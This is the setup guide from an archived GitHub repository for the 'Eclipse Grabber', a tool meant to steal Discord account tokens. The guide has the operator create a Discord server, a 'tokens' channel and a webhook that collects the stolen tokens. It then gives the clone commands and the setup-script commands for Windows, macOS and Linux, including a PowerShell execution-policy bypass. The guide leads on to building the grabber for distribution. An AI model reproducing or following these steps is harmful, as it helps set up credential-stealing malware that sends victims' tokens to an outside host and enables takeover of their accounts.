Skip to content
This repository has been archived by the owner on Jun 7, 2022. It is now read-only.

Latest commit

 

History

History
59 lines (40 loc) · 1.71 KB

SETUP.md

File metadata and controls

59 lines (40 loc) · 1.71 KB

Setup Guide for the Eclipse Grabber

Please follow the following steps to setup Eclipse.

Step 1# Create the Server

You need to create a Discord server.

Click on plus icon on discord left bar, give your server a name and click on the "Create" button.

image

Step 2# Create text channel

You need to create a Tokens channel.

Click on your server left bar with right mouse button, click on "Create Channel", name it "tokens" and click on "Create Channel".

image

Step 3# Create the Webhook

You need to create Discord Webhook from your Servers Settings >> Intergrations >> Webhooks.

  • Name it "Token" and set it's channel to "tokens"

image

Step 4# Install the Eclipse Grabber

You need to clone the repository, cd into the cloned project files, run a command to change the permissions of the setup file and run it.

git clone https://github.com/3ct0s/eclipse-grabber.git
cd eclipse-grabber

Windows

powershell.exe -ExecutionPolicy Bypass -Command .\setup-files\setup-win.ps1

MacOS

chmod +x ./setup-files/setup-mac.sh
./setup-files/setup-mac.sh

Linux

sed $'s/\r$//' ./setup-files/setup-lin.sh > ./setup-files/setup-lin-new.sh
chmod +x ./setup-files/setup-lin-new.sh
sudo ./setup-files/setup-lin-new.sh

On Linux you will be asked to say yes or no while installing the needed dependencies. Make sure you select yes and press enter.

image

Once you are done with the installation you can move to the next step which is building.

Build an Eclipse Grabber

Follow the build guide to build an eclipse grabber.